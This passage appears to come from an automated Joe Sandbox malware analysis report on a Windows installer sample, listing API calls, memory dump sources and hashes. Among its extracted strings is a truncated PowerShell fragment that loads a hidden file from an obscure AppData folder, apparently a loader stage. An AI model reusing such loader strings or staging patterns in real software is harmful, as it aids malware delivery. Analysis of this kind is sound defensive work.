                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValue
                                                                  • String ID:
                                                                  • API String ID: 849931509-0
                                                                  • Opcode ID: cdefdd5b013f918e554a2253c56164e98662eb930b786e2b832f38a56122c576
                                                                  • Instruction ID: adb3a0c882efced5b2b33e62a575662e5a0d3d88276fd09d1e11bfde7dcb239e
                                                                  • Opcode Fuzzy Hash: cdefdd5b013f918e554a2253c56164e98662eb930b786e2b832f38a56122c576
                                                                  • Instruction Fuzzy Hash: 64F04F72A00211ABEB00AFA59A8EAAE73689B54314F65443BF541B71C1D9BC5D014A2D
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DA7,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                  • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                                  • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                  • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,004055ED,?,?,00000000,004057C3,?,?,?,?), ref: 004059ED
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405A01
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                  • Instruction ID: 105d3d0d857cc0cbbba7b98f67225fc33718dd0dc61d1976ebfe603fb8111b00
                                                                  • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                  • Instruction Fuzzy Hash: 7CD01272504421AFC2102728EF0C89BBF55DB543717028B35FDB5A22F0CB304C668E99
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                  • Instruction ID: 7cd01a958b5c1bc067bce53bc18bc5b829c77e753be975c6bca72629bb04cfa2
                                                                  • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                  • Instruction Fuzzy Hash: F7E04F76180108AFD700DFA4EE4AED977ECAB14704F004021B608E6091C674E5408B58
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031DB,00000000,00000000,00402FF3,000000FF,00000004,00000000,00000000,00000000), ref: 00405AA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                  • Instruction ID: 07b625fac44bf3ff9367e003840ea8544b808996ef6c51cee1fe321e6e9f2367
                                                                  • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                  • Instruction Fuzzy Hash: B1E08C3220125AEBEF11AE958C40AEB3B6CEB04360F004832FD10E3240D234E8218FE8
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404044
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                  • Instruction ID: bb65c4dcbe1315864773f47b2f89f2ce31b8fce6277c943a49bb9af31e43d00f
                                                                  • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                  • Instruction Fuzzy Hash: 84C09BB17407007BEA208F609D46F17775477B4702F1844397341F60D0C674D410DA1C
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,00403E47), ref: 00404029
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                  • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                                  • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                  • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2E,?,?,?,?,00000000,0040344F,?), ref: 004031EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                  • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                  • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                  • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403DE0), ref: 00404012
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                  • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                                  • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                  • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049DF
                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049EA
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A34
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A47
                                                                  • SetWindowLongW.USER32(?,000000FC,00404FBF), ref: 00404A60
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A74
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A86
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A9C
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404AA8
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ABA
                                                                  • DeleteObject.GDI32(00000000), ref: 00404ABD
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AE8
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AF4
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B8A
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404BB5
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BC9
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BF8
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404C06
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404C17
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404D14
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D79
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D8E
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404DB2
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DD2
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DE7
                                                                  • GlobalFree.KERNEL32(?), ref: 00404DF7
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E70
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404F19
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F28
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F48
                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F96
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404FA1
                                                                  • ShowWindow.USER32(00000000), ref: 00404FA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: fc100a1567586deb5399e3b3a8cb6ce54a25ad1339cc7449dce1ec81924229a7
                                                                  • Instruction ID: e53c56638097080d8a9576e5f9c25271d89cd91d9f9dd4264a0f886a8ea3ee34
                                                                  • Opcode Fuzzy Hash: fc100a1567586deb5399e3b3a8cb6ce54a25ad1339cc7449dce1ec81924229a7
                                                                  • Instruction Fuzzy Hash: CE028FB0900209EFEB109F54DD85AAE7BB5FB84315F10813AF611BA2E1C7B89D52DF58
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004044D0
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004044FA
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004045AB
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004045B6
                                                                  • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 004045E8
                                                                  • lstrcatW.KERNEL32(?,: Completed), ref: 004045F4
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404606
                                                                    • Part of subcall function 00405561: GetDlgItemTextW.USER32(?,?,00000400,0040463D), ref: 00405574
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 00406098
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004060AC
                                                                    • Part of subcall function 00406035: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004060BF
                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 004046C7
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E2
                                                                  • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404768
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe, xrefs: 004045D1
                                                                  • "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overs, xrefs: 0040449A
                                                                  • : Completed, xrefs: 004045E2, 004045E7, 004045F2
                                                                  • A, xrefs: 004045A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                  • String ID: "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overs$: Completed$A$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe
                                                                  • API String ID: 2246997448-3199413834
                                                                  • Opcode ID: 03c9c59eb4c84b91af2bf482532f4491c109ec4953ec4fed60a3dea33e08e02c
                                                                  • Instruction ID: 23f2a3ef68cc2ecf1ba22192b5584ba95f97fd263584382d2916c135efe1ecf3
                                                                  • Opcode Fuzzy Hash: 03c9c59eb4c84b91af2bf482532f4491c109ec4953ec4fed60a3dea33e08e02c
                                                                  • Instruction Fuzzy Hash: 179164B1900215ABDB11AFA1CD85AAF77B8EF85314F14843BF601B72D1DB7C8A41CB69
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens, xrefs: 004020F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens
